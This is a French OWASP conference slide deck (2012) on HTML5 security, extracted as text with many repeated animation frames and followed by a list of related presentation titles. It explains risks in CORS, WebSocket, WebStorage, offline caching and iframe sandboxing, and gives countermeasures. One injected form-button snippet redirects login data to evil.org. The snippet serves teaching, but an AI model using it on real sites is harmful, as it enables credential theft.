2011 02-07-html5-security-v1

The OWASP Foundationhttp://www.owasp.org

et la Sécurité ou comment les Poneys envahissent le Web 3.0...

Sébastien GioriaFrench OWASP Leader

Global Education Committee

Paris - 7 Février 2012

Wednesday, February 8, 12

Agenda•Un peu d’histoire

•HTML5 pour les nuls en 4mn 2s

•Nouvelles attaques et protections ?

•Références

2Wednesday, February 8, 12

Back to the past201220001995

HTML 2.0 HTML 4.0 HTML 5 ?

1998 2005

JavaScriptla DOM XmlHttpRequest

ELEMENTS INTERESSANTS DE HTML5

4mn 2sNouvelles balises

• On n’est pas la pour parler de peinture...

Nouvelles APIs

• WebSocket

• WebMessaging

• IndexedDB

• OffLine Web Application

• WebStorage (votre nouveau DropBox ? ...)

• Cross Origin Ressource Sharing (déja rien que le nom est intéressant...)

4mn 2sWebSocket : Permet d’effectuer des connexions

persistantes et bi-directionnelles

• mécanisme de “Push” possible

• interface en cours de finalisation/spécifications

• nécessite un serveur “compatible”

• API minimaliste (send, receive via event)

• http://www.w3.org/TR/websockets/

4mn 2sWebMessaging : communication inter-documents

• via la méthode window.postMessage();

• pas de garantie de contenu inoffensif (ie; pas de filtre de type anti-XSS ....)

• vérification de l’origine a la charge de l’application receptrice.

• il est possible de transporter du JSON :)

• http://www.w3.org/TR/webmessaging/8

4mn 2sIndexedDB; la Web SQL Database...

•API synchrone et asynchrone

•pensée pour JavaScript; stockage d’objets

•http://www.w3.org/TR/IndexedDB/

4mn 2sOffline Web Applications: possibilité

d’exécuter tout ou partie des applications même déconnecté.

• via navigator.onLine

• mise en cache des données nécessaires(HTML, CSS, JavaScript...)

• http://www.w3.org/TR/html5/offline.html

4mn 2sWebStorage : donne la capacité au navigateur

de stocker jusqu’a 5Mo à 10Mo de données

•deux type de stockage : local ou de session

•possibilité de stocker des objets JSON

•possibilité de stocker de manière régulière

•http://www.w3.org/TR/webstorage/

SÉCURITÉ ?

OWASP Top Ten 2010

http://www.owasp.org/index.php/Top_10

A1: Injec-on A2: Cross Site Scrip-ng (XSS)

A3: Mauvaise ges-on des sessions et de l’authen-fica-on

A4:Référence directe non sécurisée à un

A5: Cross Site Request Forgery (CSRF)

A6: Mauvaise configura-on sécurité

A8: Mauvaise restric-on d’accès à

une URL

A10: Redirec-ons et transferts non validés

A7: Mauvais stockage cryptographique

A9: Protec-on insuffisante lors du

transport des données

Falsification de Forms

Il est possible de contrôler une Forms en dehors de l’élément “forms”

Falsification Forms

New VIP section of the site is open!<input form=“login” type=“submit” name=“Enter VIP section” formaction=“http://evil.org/login.php” />

Si on arrive à injecter ce code

Automatiquement, evil.org dispose des éléments et la Forms initiale est appelée

Protocol/content Handlers

Il est possible d’enregistrer des handlers de protocole ou de type de fichiers personalisés

• sms://

• application/pdf

Il est possible (mais pas recommandé) de changer les handlers standards (dépend des navigateurs)

Il n’est pas obligatoire de demander à l’utilisateur son autorisation

Cross Origin Resource Sharing 1/4

XHR ne peut dialoguer qu’avec le site Web originaire du JavaScript.

Mais c’etait sans compter les

HTTP/1.1 200 OKContent-Type: text/htmlAccess-Control-Allow-Origin: http://internal.example.com

Mais c’etait sans compter les

Bypass des contrôles d’accès

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

GET / HTTP/1.1

poc.ckers.fr

intranet

GET / HTTP/1.1

poc.ckers.fr

intranet

poc.ckers.fr

intranet

HTTP/1.1 200 Ok<script>XMLHttpRequest...

poc.ckers.fr

intranet

HTTP/1.1 200 Ok<script>XMLHttpRequest...

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

poc.ckers.fr

intranet

POST /endpoint HTTP/1.1.....(contenu de la page interne)

poc.ckers.fr

intranet

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

GET / HTTP/1.1

poc.ckers.fr

www.cible.com

DDOS ?

GET / HTTP/1.1

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

HTTP/1.1 200 Ok<iframe src=...

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

XMLHttpRequest

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

XMLHttpRequest

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

DDOS ?

XMLHttpRequest

poc.ckers.fr

www.cible.com

DDOS ?

poc.ckers.fr

www.cible.com

Contre-mesures :

•Restriction du domaine

•Ne pas faire confiance à l’entete; elle peut être modifiée par l’attaquant.

•Mettre en place des contre-mesures réseaux (pour les DDOS)

WebStoragePas de contrôle de la part de l’utilisateur

sur ce qui est stocké/accéder

L’injection de Javascript peut bypasser la limitation du contrôle d’accès.

➡Vol de Sessions

➡Vol de données sensibles

➡Tracking d’utilisateurs

WebStorageVol de Sessions; juste un peu plus

compliqué. :

le flag HTTPOnly des cookies ne fonctionne pas sur les localStorage !

WebStorageTracking User

Les localStorage ne sont pas forcément effacer lorsqu’on efface l’historique

Il est donc possible de créer des identifiants (de type cookies) persistants permettant de suivre l’utilisateur

WebSocket API :)Possible entre différents domaines

Permettrai de réduire la taille du contenu transporté ?

GET / HTTP/1.1

HTTP/1.1 200 Ok

GET / HTTP/1.1

HTTP/1.1 200 Ok

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

GET / HTTP/1.1

Upgrade WebSocket

WebSocket Protocl Handshake

HTTP/1.1 200 Ok

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

Tunnel TCP Full Duplex

Websocket MenacesParmi les attaques possible, certaines sont

triviales:

•Shell Distant

•Botnet Web

• via un XSS ou tout simplement en se connectant à un site Web.

•Port scanning...

WebSocket•Empoisonnement de cache de proxy

Proxy Transparent

GET / HTTP/1.1

Proxy Transparent

GET / HTTP/1.1

Proxy Transparent

GET / HTTP/1.1

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

WebSocket Protocol Handshake

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

GET / HTTP/1.1Host: some.host.com

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

Proxy Transparent

GET / HTTP/1.1

Upgrade WebSocket

HTTP/1.1 200 Ok

HTTP/1.1 200 OkContenu falsifié

OffLine Web Application

•Possibilité d’avoir des attaques de Type APT ?

•Possibilité de pollution des caches de navigateurs (via un point d’accès malveillant); meme du SSL

<!DOCTYPE HTML><html manifest="/cache.manifest"><body>

WebMessage•Possibilité de perte de données sensibles

(si envoyées à une “mauvaise iframe”)

postMessage()Page du site “interne”

API GeolocationPossibilité de découvrir le lieu ou se trouve

l’utilisateur (sous reserve d’avoir un GPS, ou autre système).

Perte de données de vie privée...

Bac a sable des iframes

Par défaut si rien n’est précisé :

•Les formulaires, scripts et plug-ins sont désactivés.

•Pas d’accès aux éléments stockés en local (cookies, sessionStorage, localStorage).

•Par d’AJAX

•Les liens ne peuvent cibler d’autres frames

•Le contenu est considéré externe (pas d’accès à la DOM)

Bac a sable des iframes

Lever les restrictions :

•allow-same-origin : autorise le contenu a être traité comme de la même origine est pas externe

•allow-top-navigation : l’iframe peut accéder à la navigation de niveau supérieur

•allow-forms : autorise les formulaires

•allow- scripts : les scripts (hors popup) sont autorisés

Les navigateurs ne supportent pas tous ces éléments !

Autres points importantsLes longs traitements en JavaScript

“plantaient” les navigateurs.

Les WebWorkers permettent de lancer des JavaScript en tache de fond

DDOS avec CORS & WebWorkers

Calculs distribués (cf Ravan)

Autres Points importantsCSS3 introduit de nouvelles capacités à

injecter du code JavaScript

Nouvelles capacités au ClickJacking

ConclusionPlein de nouvelles API interessantes pour

le développeur

L’ouverture se fait au détriment de la sécurité....

Une surface d’attaque accrue

La belle part au JavaScript (qui peut s’executer sans consentement utilisateur)

ww.html5test.com

Quelques Sites a suivre..

http://www.w3.org/TR/html5/ : le standard

https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet

http://www.caniuse.com : liste des différents supports d’API par navigateur

http://www.html5test.com : le support de VOTRE navigateur vis a vis de la norme.

2011 02-07-html5-security-v1

Technology

Les bases de HTML5

Fabien Nicollet / @fnicollet / fnicollet@gmail.com ... - HTML5 …html5-tutorial.fr/wp-content/uploads/2012/03/LyonJS-Leaftlet-CartoD… · Maintenant full-HTML5, même si cela a

Newschool partie1 methode HTML5

HTML5 & SilverLight 5

Rmll2010 Html5 Css3

Advanced html5

Mise en bouche a html5

MGD Html5 pres fr

Html5, css3, js, jQuery

Les base du Html5

HTML5 & CSS3 : Jeux

Technologie Web - HTML5

Html5 Cours Et Exercices

AccessiWeb HTML5/ARIA

TEMPLATE JOOMLA HTML5 / CSS3 - joomladay.fr · Le programme ! L’ HTML5/CSS3 avec le RWD ! Les Frameworks de template Joomla et l'HTML5 ! HTML5 et la compatibilité avec les navigateurs

Prsentationhtml5 html5 ii twebteck

Groupe Thématique Confiance Numérique et Sécurité · Security Research Security Missions Cross-cutting Missions 1. Security of Citizens 2. Security of infrastructures and utilities

HTML5 / CSS3christophe.delagarde.free.fr/Formation/HTML5.pdf · HTML 5 Dernière version de HTML (28 oct. 2014) Rich Interface Applications Langage balisé Basé sur XHTML 2 HTML5

SUPPORT DE COURS HTML5 - afci.fr · HTML 5 2 Introduction Historique Organismes de normalisation Définition du HTML5 Principe du HTML5 Quand choisir HTML5/CSS3 Le balisage Structure

html5 and css3